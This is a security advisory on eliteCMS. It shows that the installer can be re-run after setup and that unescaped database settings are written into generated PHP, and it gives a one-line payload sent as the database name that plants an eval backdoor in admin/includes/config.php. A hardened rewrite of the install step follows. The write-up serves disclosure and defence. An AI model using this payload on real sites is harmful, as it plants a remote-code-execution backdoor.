eliteCMS's installer is not locked after installation completes, so an attacker can re-run the installation simply by visiting the installer URL again.
A second vulnerability: the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated into the generated PHP source as-is,
    // with no escaping, so a value containing a double quote can close the
    // string literal and inject arbitrary PHP into config.php.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is then written out to config.php
    $writer = fopen($file, 'w');
    ...
Now look at the code that fills those session values:

// The POSTed form fields are copied straight into the session
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken with no validation at all.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
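As an added example (not eliteCMS's own code), the following shows how the same install step could be written so that it neither re-runs after installation nor lets submitted values break out of the generated PHP. It reuses the $_SESSION keys from the original (DB_SERVER, DB_NAME, DB_USER, DB_PASS) and assumes session_start() has already been called earlier in the installer; the lock-file path install.lock, the function names and the use of mysqli in place of the removed mysql_* functions are my own choices.

```php
<?php
// Added example, not part of eliteCMS. Hardened version of install step 4.

const CONFIG_FILE  = __DIR__ . '/../admin/includes/config.php';
const INSTALL_LOCK = __DIR__ . '/install.lock';   // hypothetical lock-file path

// Refuse to run once installation has completed, so the installer cannot be
// re-entered by simply requesting its URL again.
function installer_is_locked(): bool
{
    return file_exists(INSTALL_LOCK);
}

// Whitelist the identifiers that end up in generated PHP source. A host name,
// database name and user name never legitimately contain quotes, "<?" or
// newlines. The password stays free-form but is never pasted in raw.
function validate_db_settings(array $s): array
{
    $errors = [];
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        if (!isset($s[$key]) || !is_string($s[$key])) {
            $errors[] = "$key is missing";
        }
    }
    if ($errors) {
        return $errors;
    }
    if (!preg_match('/^[A-Za-z0-9._:-]{1,255}$/', $s['DB_SERVER'])) {
        $errors[] = 'DB_SERVER contains characters that are not valid in a host name';
    }
    if (!preg_match('/^[A-Za-z0-9_$]{1,64}$/', $s['DB_NAME'])) {
        $errors[] = 'DB_NAME must be a plain identifier';
    }
    if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $s['DB_USER'])) {
        $errors[] = 'DB_USER must be a plain identifier';
    }
    return $errors;
}

// Build config.php from PHP literals produced by var_export(): each value is
// emitted as a properly escaped single-quoted string, so a quote or "?>"
// inside it stays inside the literal instead of reopening PHP mode.
function render_config(array $s): string
{
    $lines = ['<?php', '// Generated by the installer; do not edit by hand.'];
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $lines[] = sprintf("define('%s', %s);", $key, var_export($s[$key], true));
    }
    $lines[] = '$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);';
    $lines[] = 'if (!$connection) { die("Database connection failed: " . mysqli_connect_error()); }';
    // No closing ?> tag: nothing after the last statement can switch out of PHP.
    return implode("\n", $lines) . "\n";
}

function write_config(array $s): void
{
    if (installer_is_locked()) {
        http_response_code(403);
        exit('Installation is already complete.');
    }
    $errors = validate_db_settings($s);
    if ($errors) {
        http_response_code(400);
        exit(htmlspecialchars(implode("\n", $errors)));
    }
    // Write to a temp file and rename so a half-written config is never live,
    // then drop the lock file so this step cannot run a second time.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, render_config($s), LOCK_EX) === false || !rename($tmp, CONFIG_FILE)) {
        exit('Could not write configuration file.');
    }
    file_put_contents(INSTALL_LOCK, date('c') . "\n");
}

if (($_GET['step'] ?? '') === '4') {
    write_config($_SESSION);
}
```

With this version the payload quoted above is rejected by validate_db_settings() because of the quote and angle-bracket characters; even a value that passed validation would land inside a var_export() literal, where a stray "?>" has no effect. Deleting the install directory after setup is still the safer operational habit, but the lock check means a forgotten directory no longer hands out a fresh install.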